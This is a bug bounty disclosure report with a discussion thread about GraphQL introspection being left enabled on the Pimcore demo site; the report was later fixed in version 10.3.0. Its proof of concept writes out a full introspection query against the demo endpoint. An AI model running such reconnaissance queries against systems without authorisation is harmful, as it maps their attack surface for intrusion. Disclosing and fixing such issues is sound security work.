Instropection query is enabled on demo.pimcore.fun in pimcore/demo

Valid

Reported on

Mar 11th 2023


Description

Introspection is enabled on the demo.pimcore.fun. demo site has graphql feature for users but via that graphql endpoint attacker can run the instropection queries. which makes the vulnerable.

Proof of Concept

 Just visit the link https://demo.pimcore.fun/pimcore-datahub-webservices/explorer/assets  and run the following query.
{
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    subscriptionType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

# Reference
https://www.apollographql.com/blog/graphql/security/why-you-should-disable-graphql-introspection-in-production/

# Impact

an attacker can obtain the GraphQL schema and understand the entire attack surface of the API.
We are processing your report and will contact the pimcore/demo team within 24 hours. a year ago
We have contacted a member of the pimcore/demo team and are waiting to hear back a year ago
rutvikhajare
a year ago

Researcher


Hey There any updates on this ??

pimcore/demo maintainer has acknowledged this report 10 months ago
rutvikhajare
10 months ago

Researcher


Hey There, Any updates on this ??

rutvikhajare
9 months ago

Researcher


Hey There, Any updates on this ??

rutvikhajare
9 months ago

Researcher


Hey There can you please provide the updates on this. it's been so much days and even months

rutvikhajare
7 months ago

Researcher


Hey Are you going to reply this or not ?

Divesh Pahuja modified the Severity from Critical (9.8) to Medium (6.1) 6 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Divesh Pahuja validated this vulnerability 6 months ago
rutvikhajare has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Divesh Pahuja
6 months ago

Maintainer


Hi @rutvikhajare, sorry for the late response. please update the affected version to 10.2.6 as the issue was fixed in 10.3.0 version of pimcore/demo

rutvikhajare
6 months ago

Researcher


can we have cve for this ??

Divesh Pahuja
5 months ago

Maintainer


Hi @rutvikhajare yes, after we mark it as fixed. we are just waiting for the affected version to be corrected in this report as the fix was one in 10.3.0.

@admin could you please help in correcting the affected version to 10.2.6 here? thanks!

Divesh Pahuja
5 months ago

Maintainer


@admin friendly reminder

Ben Harvie
5 months ago

Admin


Hey Divesh, the affected version has now been updated as requested:)

rutvikhajare
5 months ago

Researcher


Hey devish as the affected version updated can you please go with the further process

Divesh Pahuja
5 months ago

Maintainer


thank you guys!

Divesh Pahuja marked this as fixed in 10.3.0 with commit a2a7ff 5 months ago
The fix bounty has been dropped
This vulnerability has now been published 5 months ago
to join this conversation